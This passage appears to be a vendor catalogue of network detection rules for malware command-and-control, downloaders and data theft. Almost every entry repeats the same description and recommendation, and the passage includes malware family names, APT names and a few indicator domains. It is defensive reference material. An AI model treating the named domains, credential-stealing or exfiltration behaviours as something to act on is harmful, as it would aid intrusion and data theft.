This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/Shlayer Malicious Download Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker Checkin

Description

Recommendation

ET MALWARE OSX/WireLurker CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE OSX/WireLurker HTTP Request for manhuaba.com.cn

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker HTTP Request for www.comeinbaby.com

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WireLurker User-agent (globalupdate)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/WizardUpdate CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE OSX/ZuRu Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with Base64 ps PowerShell Command Output M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Outbound POST Request with ps PowerShell Command Output

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Packed Perl with Eval Statement

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker C2 Domain (uiaoduiiej .chimkent .su in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Panda Banker Injects Domain (urimchi3dt4 .website in TLS SNI)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pandemiya User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Papras Banking Trojan Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Password Stealer - User-Agent (Ucheck)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork APT CnC Beacon 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Patchwork Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork Backdoor - Requesting Task

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Patchwork Backdoor - Sending Task Results

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PawnStorm Sednit DL Aug 28 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PDF 0day Communication - agent UA Feb 14 2013

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Peppy/KeeOIL Google Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Phorpiex Botnet Downloader Activity (GET)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHP Skimmer Exfil Attempt

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage1 CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage2 CnC Activity M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PHPs Labyrinth Backdoor Stage2 CnC Activity M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plasmabot CnC Host Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Hardcoded String Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Payload CnC Checkin (x64)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Platinum APT - Titanium Payload CnC Checkin (x86)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PLATINUM Dipsind CnC Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE PLATINUM Steganographic HTTP Response Page Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Playtech Downloader Online Gaming Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Plead TSCookie CnC Checkin M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX Activity (POST)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX/Destory HTTP traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX/Korplug CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PlugX variant

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PNScan.2 Inbound Status Check Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PNScan.2 Inbound Status Check - set

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE PoetRAT Upload via HTTP

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Polaris Botnet User-Agent (Outbound)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Post-infection Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Sending Data to Controller 1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup C2 Sending Data to Controller 2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M4

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M6

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M7

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M8

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup HTTP Request (generic) M9

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Ponmocup Redirection from infected Website to Trojan-Downloader

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pontoeb CnC

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pony Downloader HTTP Library MSIE 5 Win98

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Pony Loader default URI struct

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Adwind/jSocket SSL Cert (assylias.Inc)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 DOC Uploader SSL/TLS Certificate Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 Maldoc CnC Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT28 Xtunnel Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT29 CozyBear/SeaDaddy SSL/TLS Certificate Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT30 or Win32/Nuclear HTTP Framework

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT34 TONEDEAF 2.0 User-Agent Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT40/Dadstache Stage 2 Payload Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible APT 41 Fake Server Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC Check Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC Command Response

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible APT Sarhurst/Husar/Hussarini/Hassar CnC POST

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Archie EK Payload Checkin GET

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Asprox Pizza

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Astaroth User-Agent Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Babar POST Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Backdoor.Linux.Tsunami Outbound HTTP request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible BACKSWING JS Framework POST Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Banload Downloading Executable

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Bedep Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Bedep Connectivity Check (2)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Charming Kitten Backdoor Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Charming Kitten Backdoor CnC Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M1

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M2

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible CryptoPHP Leaking Credentials May 8 2015 M3

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DACLS RAT CnC (Log Server Reporting)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DANDERSPRITZ Default HTTP Headers

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DANDERSPRITZ HTTP Beacon

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible Darkhotel Higasia Downloader Checkin

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Darkhotel Higasia Downloader Connectivity Check

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Darkhotel Higasia Downloader Requesting Module

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DarkRats Tor Traffic

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DarkTequila SSL/TLS Certificate Observed

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible DEEP PANDA C2 Activity

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Deep Panda - Sakula/Mivast RAT CnC Beacon 5

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

MITRE ATT&CK Techniques

  • Exfiltration Over C2 Channel - T1041

ET MALWARE Possible Deep Panda User-Agent

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dragonfly APT Activity HTTP URI OPTIONS

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dridex Download URI Struct with no referer

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Drive DDoS Check-in

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Duqu 2.0 Request

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert (fake state)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert Jan 22 2015

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M1 (L O)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M2 (L CN)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Dyre SSL Cert M3 (O CN)

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Emissary External IP Lookup

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Encoded Wide PowerShell (IEX) in Certificate Inbound

Description

This detection identifies malware-related activity using Rapid7’s Insight Network Sensor. Malicious actors often use malware in order to gain access to victim organizations.

Recommendation

Review the alert in question. If necessary, rebuild the host from a known, good source and have the user change their password.

ET MALWARE Possible Evil Macro Downloading Trojan Dec 16 2015 Post to EXE

Description

